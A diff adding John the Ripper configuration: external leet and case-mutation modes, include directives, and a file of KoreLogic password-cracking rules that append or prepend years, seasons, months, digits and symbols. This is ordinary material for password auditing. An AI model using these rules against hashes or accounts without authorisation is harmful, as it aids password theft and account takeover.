+	max_mangle = 4000; /* Stop building new letters if our count goes over this value */
+	original_word = 0;
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle_letters && hybrid_total < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		if (word[wlen] == 'a') {
+			rotor[rotor_off++] = 'a';
+			rotor[rotor_off++] = '4';
+			rotor[rotor_off++] = '@';
+		}
+		else if (word[wlen] == 'b') {
+			rotor[rotor_off++] = 'b';
+			rotor[rotor_off++] = '8';
+		}
+		else if (word[wlen] == 'e') {
+			rotor[rotor_off++] = 'e';
+			rotor[rotor_off++] = '3';
+		}
+		else if (word[wlen] == 'g') {
+			rotor[rotor_off++] = 'g';
+			rotor[rotor_off++] = '9';
+		}
+		else if (word[wlen] == 'i') {
+			rotor[rotor_off++] = 'i';
+			rotor[rotor_off++] = '1';
+			rotor[rotor_off++] = '!';
+		}
+		else if (word[wlen] == 'l') {
+			rotor[rotor_off++] = 'l';
+			rotor[rotor_off++] = '1';
+		}
+		else if (word[wlen] == 'o') {
+			rotor[rotor_off++] = 'o';
+			rotor[rotor_off++] = '0';
+		}
+		else if (word[wlen] == 's') {
+			rotor[rotor_off++] = 's';
+			rotor[rotor_off++] = '$';
+			rotor[rotor_off++] = '5';
+		}
+		else if (word[wlen] == 't') {
+			rotor[rotor_off++] = 't';
+			rotor[rotor_off++] = '7';
+		}
+		if (rotor_off > rotor_ptr[wlen]) {
+			rotor_cnt[wlen] = rotor_off-rotor_ptr[wlen];
+			hybrid_total *= rotor_cnt[wlen];
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# External hybrid CaSE mutation code
+[List.External:Case]
+
+int rotor[251]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
+	original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen, ch;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		ch = word[wlen];
+		if (ch >= 'A' && ch <= 'Z') {
+			ch += 0x20;
+			word[wlen] = ch;
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+		}
+		if (ch >= 'a' && ch <= 'z') {
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+			rotor_cnt[wlen] = 2;
+			hybrid_total *= 2;
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# Alternate hybrid external 'leet' mode (HybridLeet)
+.include <hybrid.conf>
+
+# dumb-force UTF-16, in an external file
+.include <dumb16.conf>
+
+# dumb-force UTF-32, in an external file
+.include <dumb32.conf>
+
+# repeats UTF-16, in an external file
+.include <repeats16.conf>
+
+# repeats UTF-32, in an external file
+.include <repeats32.conf>
+
+# Dynamic ($dynamic_n$) scripting code, in an external file
+.include <dynamic.conf>
+
+# Regex alphabets
+.include <regex_alphabets.conf>
+
+# NOTE, this file (john.local.conf) is deprecated. If you had any modified logic in this
+# file, please create and move it to john-local.conf.  The file simply can be renamed to
+# the new john-local.conf if you so choose.
+.include '$JOHN/john.local.conf'
+
+# include john-local.conf (This file can be created by user, to override defaults in this john.conf file)
+.include '$JOHN/john-local.conf'
+
+# include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)
+.include './john-local.conf'
+
+# End of john.conf file.
+# Keep this comment, and blank line above it, to make sure a john-local.conf
+# that does not end with \n is properly loaded.
@@ -0,0 +1,522 @@
+####################################################################
+# KoreLogic Custom John the Ripper Rules:
+####################################################################
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:PrependSeason]
+a6 A0"[Ss$][uU][mM][mM][eE3][rR]"
+a6 A0"[Ww][iI|][nN][tT+][eE3][rR]"
+a4 A0"[Ff][aA][lL][lL]"
+a6 A0"[Ss][pP][rR][iI][nN][gG]"
+a6 A0"[Aa][uU][tT][uU][mM][nN]"
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:AppendSeason]
+a6 Az"[Ss$][uU][mM][mM][eE3][rR]"
+a6 Az"[Ww][iI|][nN][tT+][eE3][rR]"
+a6 Az"[Ff][aA][lL][lL]"
+a6 Az"[Ss][pP][rR][iI][nN][gG]"
+a6 Az"[Aa][uU][tT][uU][mM][nN]"
+
+[List.Rules:PrependHello]
+a5 A0"[hH][eE][lL][lL][oO0]"
+
+[List.Rules:PrependYears]
+a4 A0"20[0-1][0-9]"
+a4 A0"19[3-9][0-9]"
+
+# Notice: Your wordlist should likely be all lowercase - or you are wasting work
+[List.Rules:AppendYears]
+-[c:] a4 \p[c:] Az"19[0-9][0-9]"
+-[c:] a4 \p[c:] Az"20[01][0-9]"
+
+# Notice how we
+# 1) do caps first b/c they are more common in 'complex' environments
+# 2) Do !$@#%. first b/c they are the most common special chars
+[List.Rules:AppendCurrentYearSpecial]
+-[c:] a5 \p[c:] Az"201[0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4Num]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append5Num]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append6Num]
+-[c:] a6 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendSpecial3num]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:AppendSpecial4num]
+-[c:] a5 \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]"
+-[c:] a5 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q
+
+[List.Rules:PrependCAPCAPAppendSpecial]
+a3 A0"[A-Z][A-Z]" $[!$@#%.]
+a3 A0"[A-Z][A-Z]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNumAppendSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[!$@#%.]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNum]
+-[c:] a2 \p[c:] A0"[0-9][0-9]"
+
+[List.Rules:PrependNumNumNum]
+-[c:] a3 \p[c:] A0"[0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumNumNum]
+-[c:] a4 \p[c:] A0"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Prepend2NumbersAppend2Numbers]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecial]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialNumberNumber]
+-[c:] a3 \p[c:] Az"[!$@#%.][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+
+[List.Rules:AppendSpecialNumberNumberNumber]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:PrependSpecialSpecialAppendNumber]
+-[c:] a3 \p[c:] A0"[!$@#%.][!$@#%.]" $[0-9]
+-[c:] a3 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q $[0-9]
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+-[c:] a4 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9]"
+-[c:] a4 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+-[c:] a5 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]"
+-[c:] a5 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]"
+
+[List.Rules:Append2Letters]
+a2 Az"[a-z][a-z]"
+-c a2 Az"[A-Z][A-Z]"
+-c a2 Az"[a-z][A-Z]"
+-c a2 Az"[A-Z][a-z]"
+
+[List.Rules:Prepend4NumAppendSpecial]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" $[!$@#%.]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4NumSpecial]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append3NumSpecial]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][!$@#%.]"
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append2NumSpecial]
+-[c:] a3 \p[c:] Az"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+# Append numbers - but limit the total length.
+[List.Rules:AddJustNumbers]
+-[c:] <* >1 \p[c:] $[0-9]
+-[c:] <* >1 \p[c:] ^[0-9]
+-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
+-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
+-[c:] a3 >1 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 >1 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:DevProdTestUAT]
+-\r[::cc] a3 A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a3 A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
+
+[List.Rules:PrependAndAppendSpecial]
+-[c:] a2 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:AppendJustNumbers]
+-[c:] <* \p[c:] $[0-9]
+-[c:] <- \p[c:] Az"[0-9][0-9]"
+-[c:] a3 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendNumbers_and_Specials_Simple]
+# cap first letter then add a 0  2 6 9 ! *  to the end
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+# Cap the first letter - then add 0? 0! 5_ .. 9!
+## add NUMBER then SPECIAL    1! .. 9?
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Number Number Special
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Special Number Number
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+# Add 100! ... 999! to the end
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendJustSpecials]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:MonthsFullPreface]
+-[:c] a7 A0"\p[jJ]anuary"
+-[:c] a8 A0"\p[fF]ebruary"
+-[:c] a5 A0"\p[mM]arch"
+-[:c] a5 A0"\p[aA]pril"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a6 A0"\p[aA]ugust"
+-[:c] a9 A0"\p[sS]eptember"
+-[:c] a7 A0"\p[oO]ctober"
+-[:c] a8 A0"\p[nN]ovember"
+-[:c] a8 A0"\p[dD]ecember"
+
+[List.Rules:AddShortMonthsEverywhere]
+a3 >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
+a3 >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
+a3 >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
+a3 >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
+a3 >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
+a3 >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
+a3 >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
+a3 >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
+
+[List.Rules:Prepend4LetterMonths]
+## Preface each dictionary with Janu janu Febr febr
+-[:c] a4 A0"\p[jJ]anu"
+-[:c] a4 A0"\p[fF]ebr"
+-[:c] a4 A0"\p[mM]arc"
+-[:c] a3 A0"\p[aA]pr"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a4 A0"\p[Aa]ugu"
+-[:c] a4 A0"\p[sS]ept"
+-[:c] a4 A0"\p[oO]cto"
+-[:c] a4 A0"\p[nN]ove"
+-[:c] a4 A0"\p[Dd]ece"
+
+# this will add the string '2010' at all places in the word:
+# USE this with a 4 or 5 char dictionary file with ALL characters
+# soo abcde will become
+# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
+[List.Rules:Add2010Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"201[0-9]"
+
+[List.Rules:PrependDaysWeek]
+a6 A0"[Mm][oO0][nN][dD][aA4@][yY]"
+a7 A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
+a9 A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
+a8 A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
+a6 A0"[Ff][rR][iI1!][dD][aA4@][yY]"
+a8 A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
+a6 A0"[Ss][uU][nN][dD][aA4@][yY]"
+
+[List.Rules:Add1234_Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"1234"
+
+[List.Rules:AppendMonthDay]
+-[:c] <* Az"\p[jJ]anuary"
+-[:c] a8 Az"\p[jJ]anuary[0-9]"
+-[:c] a9 Az"\p[jJ]anuary[0-9][0-9]"
+-[:c] <* Az"\p[fF]ebruary"
+-[:c] a9 Az"\p[fF]ebruary[0-9]"
+-[:c] aA Az"\p[fF]ebruary[0-9][0-9]"
+-[:c] <* Az"\p[mM]arch"
+-[:c] a6 Az"\p[mM]arch[0-9]"
+-[:c] a7 Az"\p[mM]arch[0-9][0-9]"
+-[:c] <* Az"\p[aA]pril"
+-[:c] a6 Az"\p[aA]pril[0-9]"
+-[:c] a7 Az"\p[aA]pril[0-9][0-9]"
+-[:c] <* Az"\p[mM]ay"
+-[:c] a4 Az"\p[mM]ay[0-9]"
+-[:c] a5 Az"\p[mM]ay[0-9][0-9]"
+-[:c] <* Az"\p[jJ]une"
+-[:c] a5 Az"\p[jJ]une[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] a6 Az"\p[jJ]une[0-9][0-9]"
+-[:c] <* Az"\p[jJ]uly"
+-[:c] a5 Az"\p[jJ]uly[0-9]"
+-[:c] a6 Az"\p[jJ]uly[0-9][0-9]"
+-[:c] <* Az"\p[aA]ugust"
+-[:c] Az"\p[aA]ugust[0-9]"
+-[:c] Az"\p[aA]ugust[0-9][0-9]"
+-[:c] <* Az"\p[sS]eptember"
+-[:c] aA Az"\p[sS]eptember[0-9]"
+# There was a typo in Kore's original revision of this rule
+-[:c] aB Az"\p[sS]eptember[0-9][0-9]"
+-[:c] <* Az"\p[oO]ctober"
+-[:c] a8 Az"\p[oO]ctober[0-9]"
+-[:c] a9 Az"\p[oO]ctober[0-9][0-9]"
+-[:c] <* Az"\p[nN]ovember"
+-[:c] a9 Az"\p[nN]ovember[0-9]"
+-[:c] aA Az"\p[nN]ovember[0-9][0-9]"
+-[:c] <* Az"\p[dD]ecember"
+-[:c] a9 Az"\p[dD]ecember[0-9]"
+-[:c] aA Az"\p[dD]ecember[0-9][0-9]"
+
+[List.Rules:AppendMonthCurrentYear]
+-[:c] a7 Az"\p[jJ]an201[0-9]"
+-[:c] a7 Az"\p[fF]eb201[0-9]"
+-[:c] a7 Az"\p[mM]ar201[0-9]"
+-[:c] a7 Az"\p[aA]pr201[0-9]"
+-[:c] a7 Az"\p[mM]ay201[0-9]"
+-[:c] a7 Az"\p[jJ]un201[0-9]"
+-[:c] a7 Az"\p[jJ]ul201[0-9]"
+-[:c] a7 Az"\p[Aa]ug201[0-9]"
+-[:c] a7 Az"\p[sS]ep201[0-9]"
+-[:c] a7 Az"\p[oO]ct201[0-9]"
+-[:c] a7 Az"\p[nN]ov201[0-9]"
+-[:c] a7 Az"\p[Dd]ec201[0-9]"
+
+[List.Rules:ReplaceNumbers2Special]
+a0 /[1-90] s\0\p[!@#$%^&*()]
+a0 /1 /[2-90] s1! s\0\p[@#$%^&*()]
+a0 /2 /[3-90] s2@ s\0\p[#$%^&*()]
+a0 /3 /[4-90] s3# s\0\p[$%^&*()]
+a0 /4 /[5-90] s4$ s\0\p[%^&*()]
+a0 /5 /[6-90] s5% s\0\p[^&*()]
+a0 /6 /[7-90] s6^ s\0\p[&*()]
+a0 /7 /[890] s7& s\0\p[*()]
+a0 /8 /[90] s8* s\0\p[()]
+a0 /9 /0 s9( s0)
+
+[List.Rules:ReplaceNumbers]
+a0 /0 s0[1-9]
+a0 /1 s1[02-9]
+a0 /2 s2[013-9]
+a0 /3 s3[0-24-9]
+a0 /4 s4[0-35-9]
+a0 /5 s5[0-46-9]
+a0 /6 s6[0-57-9]
+a0 /7 s7[0-68-9]
+a0 /8 s8[0-79]
+a0 /9 s9[0-8]
+# 10 lines above can be replaced with just one:
+# /[0-9] s\0[0-9] Q
+# but it's slower (generates, then rejects some duplicates).
+
+# This is a lamer/faster version of --rules:nt
+[List.Rules:ReplaceLettersCaps]
+-c a0 /[a-z] s\0\p[A-Z]
+
+[List.Rules:AddDotCom]
+-[c:] a4 \p[c:] Az".com"
+-[c:] a4 \p[c:] Az".net"
+-[c:] a4 \p[c:] Az".org"
+
+[List.Rules:AppendCap-Num_or_Special-Twice]
+-[c:] a3 \p[c:] Az"[A-Z][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+-[c:] a3 \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+-[c:] a3 \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialLowerLower]
+-[c:] a3 \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q
+
+[List.Rules:AppendJustSpecials3Times]
+-[c:] a3 \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]"
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:PrependJustSpecials]
+-[c:] a1 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append1_AddSpecialEverywhere]
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
+
+[List.Rules:PrependNumNum_AppendNumSpecial]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendNum_AddSpecialEverywhere]
+# This should probably use $[02-9] since we try $1 in
+# Append1_AddSpecialEverywhere
+-[c:] >4 a2 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+-[c:] >[5-8] a2 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[02-9]
+
+[List.Rules:AppendNumNum_AddSpecialEverywhere]
+-[c:] >4 a3 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+-[c:] >[5-8] a3 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]"
+
+[List.Rules:AppendNumNumNum_AddSpecialEverywhere]
+-[c:] >4 a4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+-[c:] >[5-8] a4 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]"
+
+[List.Rules:AppendYears_AddSpecialEverywhere]
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >4 a5 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]"
+-[c:] >[5-8] a5 \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]"
+
+# This rule needs work actually --- you have to 'sort -u' its output    rick
+# /a = reject if it doesnt have an 'a'
+# the [:c] does waste some effort - and generate dupes. This is wasteful,
+# but I want to keep it in b/c the original crack/JtR rules use it.
+[List.Rules:L33t]
+-[:c] a0 /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
+# The following line differs from Kore's erroneous 4 lines:
+-[:c] a0 /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
+#/Lsl1[:c]
+#/Lsl7[:c]
+#/Lsl|[:c]
+#/Lsl![:c]
+-[:c] a0 /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Full set (same as above, but on one line):
+#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Double substitutions start here.
+# Compared to Kore's, we check for both chars first, then replace both.
+# This produces different results from Kore's, which would replace all
+# instances of the first char before checking for the second.
+# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
+# on the line below, and ditto for further lines.
+-[:c] a0 /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT111100334@557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeE@4sSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore had these (probably unintentionally, so we don't duplicate them):
+#/asa4/4s4a[:c]
+#/asa4/4s4A[:c]
+-[:c] a0 /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
+#/AsA4/4s4a[:c]
+#/AsA4/4s4A[:c]
+-[:c] a0 /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+-[:c] a0 /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
+# Kore's rules only included sl[17|], but not sl!
